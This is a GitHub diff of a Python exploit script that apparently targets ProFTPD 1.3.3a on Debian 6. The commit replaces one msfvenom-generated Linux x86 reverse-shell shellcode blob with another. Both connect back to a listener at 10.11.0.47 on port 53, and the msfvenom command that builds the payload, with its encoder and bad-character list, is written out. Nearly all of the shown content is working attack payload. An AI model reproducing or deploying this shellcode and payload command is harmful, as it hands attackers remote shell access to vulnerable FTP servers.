File tree 1 file changed +8
-8
lines changed
1 file changed +8
-8
lines changed Original file line number Diff line number Diff line change 2
2
import socket
3
3
import struct
4
4
5
- # msfvenom -a x86 -p linux/x86/shell_reverse_tcp LHOST=10.11.0.47 LPORT=53 -e x86/shikata_ga_nai -b "\x09\x0a\x0b\x0c\x0d\x20\xff" -f c
5
+ # msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.11.0.47 LPORT=53 -e x86/shikata_ga_nai -b "\x09\x0a\x0b\x0c\x0d\x20\xff" -f c
6
6
# Payload size: 95 bytes
7
7
shellcode = (
8
- "\xba \xbf \xed \x1e \xfb \xda \xd8 \xd9 \x74 \x24 \xf4 \x5e \x31 \xc9 \xb1 "
9
- "\x12 \x83 \xee \xfc \x31 \x56 \x0e \x03 \xe9 \xe3 \xfc \x0e \x24 \x27 \xf7 "
10
- "\x12 \x15 \x94 \xab \xbe \x9b \x93 \xad \x8f \xfd \x6e \xad \x63 \x58 \xc1 "
11
- "\x91 \x4e \xda \x68 \x97 \xa9 \xb2 \x60 \x6c \x4a \x6d \x1d \x70 \x4a \x71 "
12
- "\xe8 \xfd \xab \xc1 \x74 \xae \x7a \x72 \xca \x4d \xf4 \x95 \xe1 \xd2 \x54 "
13
- "\x3d \x94 \xfd \x2b \xd5 \x00 \x2d \xe3 \x47 \xb8 \xb8 \x18 \xd5 \x69 \x32 "
14
- "\x3f \x69 \x86 \x89 \x40 "
8
+ "\xba \xa4 \xf8 \x5b \xa8 \xd9 \xc6 \xd9 \x74 \x24 \xf4 \x58 \x2b \xc9 \xb1 "
9
+ "\x12 \x83 \xe8 \xfc \x31 \x50 \x0e \x03 \xf4 \xf6 \xb9 \x5d \xc5 \xdd \xc9 "
10
+ "\x7d \x76 \xa1 \x66 \xe8 \x7a \xac \x68 \x5c \x1c \x63 \xea \x0e \xb9 \xcb "
11
+ "\xd4 \xfd \xb9 \x65 \x52 \x07 \xd1 \x7f \xaf \xf7 \x0e \xe8 \xad \xf7 \x50 "
12
+ "\xdd \x38 \x16 \xe0 \x7b \x6b \x88 \x53 \x37 \x88 \xa3 \xb2 \xfa \x0f \xe1 "
13
+ "\x5c \x6b \x3f \x75 \xf4 \x1b \x10 \x56 \x66 \xb5 \xe7 \x4b \x34 \x16 \x71 "
14
+ "\x6a \x08 \x93 \x4c \xed "
15
15
)
16
16
17
17
# Debian 6 - ProFTPD 1.3.3a
You can’t perform that action at this time.
0 commit comments